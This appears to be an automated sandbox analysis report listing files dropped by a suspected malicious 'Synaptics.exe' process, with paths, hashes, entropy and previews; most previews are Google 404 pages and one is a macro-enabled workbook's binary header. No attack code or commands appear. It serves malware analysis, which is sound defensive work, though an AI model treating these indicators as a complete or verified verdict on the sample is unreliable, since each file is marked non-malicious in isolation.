                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.262777616952167
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0NrISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+YrI+pAZewRDK4mW
                                                                                                                    MD5:89E8B37F7EE5CAFBB4DF03FC6A711D48
                                                                                                                    SHA1:E64F42A747C806A1BEEAF3FAF3247243AD52E5E3
                                                                                                                    SHA-256:908F7DCCC6D87E8379EA38B1068492CBAEA210CB3ECF4BA6581C606637077D4B
                                                                                                                    SHA-512:5C5D656B467BC93CC206252EED1B7D3C7C6D4C8D944159141224FDA484FB020209AADC982792D50670E3E0942F441D1B1F115320A9DD6BFC68E3A3A9673A1E2C
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u6xWxbACktDM7-YmebxYvQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\aAgReVt.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.264771841321134
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+003SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                    MD5:A60402D46A8858B9357E6F718E6212B0
                                                                                                                    SHA1:F0DBF63DA2B0A532D1F69C25FC4E8994F2849850
                                                                                                                    SHA-256:C260BEEA599C4FD2C62A949AABA9AC9FE0E667C5C2D7CABA80CADEB4893492FE
                                                                                                                    SHA-512:66436EBE4581992BABDB40D0735ABCF79E43EE68713E6DB7FA243983E664BD3054C1D7BB45BC847A3DA2E51E1CD887048578FBCDE490AA098020BE806B2D57B7
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RK78PrU10HUbGE75wqiIiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\btUruDm.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2651510233184045
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0xrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                    MD5:08FEE30834F60B612BDA705C33D78530
                                                                                                                    SHA1:7E86E7D95248D49CD544CC1D6406D8506773C386
                                                                                                                    SHA-256:C68EECE2A680FAC83986C7C7F2BE29DE879E9DB981F0EDD1406259205DF95FDB
                                                                                                                    SHA-512:D535707EF94040FD93A0E7032FC43A5E718671134E320BCF586674C57BAFB8C33E3BF895A26C42D790EE839CB6B9F86571B0E725B474F3563505A8F634D42950
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sh4RSBxbT2xZvPtHwRIrqA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\c2jUHMi5.xlsm

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18387
                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                    Malicious:false
                                                                                                                    Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                    C:\Users\user\AppData\Local\Temp\czcgRiO.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.26497472974088
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0IbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Zb+pAZewRDK4mW
                                                                                                                    MD5:1E73768319BCC1EC6769A438BAA6FFE5
                                                                                                                    SHA1:2A28EC26DDFC57E79B2B8B9099826B6E9B69E21A
                                                                                                                    SHA-256:7A489463D008DC5BE894F6C5128D5C31D152890432E73A9AD4B2A46C825F0207
                                                                                                                    SHA-512:27F07EC58DF1328AC8BD4F39B842601A3596446B0E418C714CCC6FACEF073C42200C8C16BE78EA4352E098BFBE9D0BD10039958059F3CB148A08D0BB5B7C3F81
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZFcutSxMR_lf3aBdJRMVrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\d9KGTlh.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.257005430454805
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                    MD5:8DC3EE8ED66863C254FA8B59402192C6
                                                                                                                    SHA1:F6F6108CB580ED15D06B8BDD977C29EAAB02B550
                                                                                                                    SHA-256:352BB13EAAA8D71624707F648A14D5810FDC9B037EB219BB01AEC5AFB16A7D44
                                                                                                                    SHA-512:8EB34FED6A6A89D732D50778832C50514C67BED21B6B02B80FDD52704EB6F6821510CC2640C67043958F30A53804DF3D013494A51D59D0D1F70BA179383C0C67
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ODt7_5y3PkcBI0rbTpJcww">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\egEnWPF.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.257453173012007
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0uISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3I+pAZewRDK4mW
                                                                                                                    MD5:B55702CC953F5AFA2122761902A1EE38
                                                                                                                    SHA1:FD8DF8EE555697367D622B93DF767065E51EFC6B
                                                                                                                    SHA-256:A61ED81EFA0D189F7079442968D5BA0D11503568C99E32D1EDEB74CC0CF89808
                                                                                                                    SHA-512:A4CC8D1444AA78A3EE02B9F1ECA429C3D752255F4E56AE4EA9E43631E23BF91D7E49B6B67641AB3D1D62AD7CCC8A04AA58988901D27FB58EB8895463B4F264F2
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IX9JZmexo9L524s2KftXTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\gbvaaeG.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263131917638512
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0PPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kP+pAZewRDK4mW
                                                                                                                    MD5:5D848EA9C383C79E44CC9F7B22F07365
                                                                                                                    SHA1:042FB689C6ECD4F02B67B3F3AA20B05D82669DEA
                                                                                                                    SHA-256:106A9A179DDB1D3F0B6D93CF119E0B1C72E2D71CEED29DE8F51FFBB254EDA993
                                                                                                                    SHA-512:298AE56C3C6627349BAFD4169FA51AF683E32D67FE6CB3EDBB730BF268C2D9242B604DCE8BC3E9963E9BD470D6FF690B8DE1CB65864D2FD155B27ECFF77132AC
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hTQGtVuItzmAW5zjYNlacw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\jL7a1hw.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.269330250731869
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0K7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                                    MD5:91483FADA3DDB58AAF26ADBEDC98096C
                                                                                                                    SHA1:2DE127D9AAE2311CD947241284F0DD14A8B88126
                                                                                                                    SHA-256:E436D29A5742901C7BB0C28C838B2E0869DCC86B4DCB662500169B367EA19F56
                                                                                                                    SHA-512:36BCC0BD39D9B8EF570A9C7BDFF713D4B1287954DF0FB10F7E75E8465BED421C3C7FB02B28BAB039DFFC1945113BA5ACCC4AE1FA1005072FA2A4446CDE9D458C
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="py9GQjqLophvJqVLDZKi_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\jWvxSa4.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263254814629512
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0F8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                                    MD5:4D79AAE03F4293D984EB1EE9168355F1
                                                                                                                    SHA1:1957EC54EB95D323986CCC2B2A2269DEDF25E863
                                                                                                                    SHA-256:B94E0B233FFF00FC4F79712814C7758C9A2A78AAD11B2EA0D7EF272E9D395C82
                                                                                                                    SHA-512:0A8BE80C8AAB2F214FA4F5E291BA6C1A95554F8EA6906B10966CC6DB9D26B90DBF8926E21B855805D69C8D1D0689996E304D01F81AECCC22BCF3658A48E468D8
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n14l0NCArwvQnVXGJCM-mA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\kkjEQxE.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.264126837479052
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BjtQISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++jOI+pAZewRDK4mW
                                                                                                                    MD5:D938657CF1EBFF65B08EE281D0988B80
                                                                                                                    SHA1:66D29D439598BD46F4D4F912CD1C5CF9B606C052
                                                                                                                    SHA-256:A298663BA79B5539FAB6D41CE5C6E61FDB034CA6CFA7D4081A251C5F95802414
                                                                                                                    SHA-512:21D6C33631B3CEB72F24F05F3233DCEA1D130B16740637F057795D902FC0941C353CD643F4E2DB73EE13243274D3FFC42BD0C8C1FE6BD490DB32A6B9E6D42BBC
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6Ki3doqevEe8drJzSGj1VA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\lvlcQhn.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.269917372936508
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0ulDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+VD+pAZewRDK4mW
                                                                                                                    MD5:AE8931FF7AFE85D19F682C92192054B4
                                                                                                                    SHA1:D5D5176A83936E9896BF170E199ACABD28479754
                                                                                                                    SHA-256:1461FACEAD8777C160BC5966E9A3AAD4072659B61309CE26AEDC5AC3C4E2BB6B
                                                                                                                    SHA-512:DA631E9CEA56A23B54B1B66078D5A8453BE36805E9C4D396035CB51187F471C7D8C8FB76FE055FD813F9CA114E2C9DD4953604E02B1A13C4EFAFCC0D203A1701
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PJy8HMWSeNZTWg__sA0Rwg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\ppKZrs1.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263893385591117
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+06kqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+gq+pAZewRDK4mW
                                                                                                                    MD5:98E8452FC5DA9BDA0C5A3921FC5E7FBC
                                                                                                                    SHA1:FAAB1349BB77AE54EBE5A62A136B9131551A2C12
                                                                                                                    SHA-256:BA12CA2C42C6E7B7DF421A1A340A6A1B0AE83DA845F8D4F1CCEE8A7731A97AE5
                                                                                                                    SHA-512:9C89124AEF0323734810DAA489F8BF3A6B90B7F08465113775E13C16FD164E7C8AA62BEB1606A58C4B4C4F98BA23CBBEB1DC3D3F8D26BCA26CDC76CB76B06943
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S7T3jT7j6q9We9kttWIm-g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\qkJZGA9.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (1024), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1024
                                                                                                                    Entropy (8bit):5.243675193434302
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:GtRcFsMxTe+0YTcTMDpdK+z6XZepP5CRfqMGDZGOjqkRZNc6V2nEARBGO1RR0Vpn:GgsF+0BYSU6pepPQfkZbc6cn1BZdAe1c
                                                                                                                    MD5:5D6CDEE9E4B717A5AABCEE3E5E3656A7
                                                                                                                    SHA1:3112B3704A8B5EE269F58FBCDA7A8F15D2BC121A
                                                                                                                    SHA-256:7B5F6C5B6B86B1CFD85EB01C538661186F046892EBE2462801F71689F1219B05
                                                                                                                    SHA-512:508034C12C06EA0A8E957234491F819E452ADE65823DF020E5F007ABA1BCB22412248D099FED0AFE3C37E0E422E66AE0B653D427A3999DA31BA15D23933D13F0
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-arP98uV53z1OigDJGyksA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\sGucSTk.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.273120353438499
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0RaBbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NBb+pAZewRDK4mW
                                                                                                                    MD5:166EEBF8D4B0DC0512B5B74413226CBC
                                                                                                                    SHA1:179A0C2BAF25AE475E8D8A2CC0AFBAD027D0B69C
                                                                                                                    SHA-256:F0C1F762D758BE6DF2895214C5BE2677E45389E15ACEE260CC5947DE6579582B
                                                                                                                    SHA-512:6DA289467E0E0A3BD6278741E1335C9C948D538E0DE38970AEABA890113396722563E155191F18E37FA9A303C26D900CC246926B8B3B4BDA3D9F56887777C2B5
                                                                                                                    Malicious:false
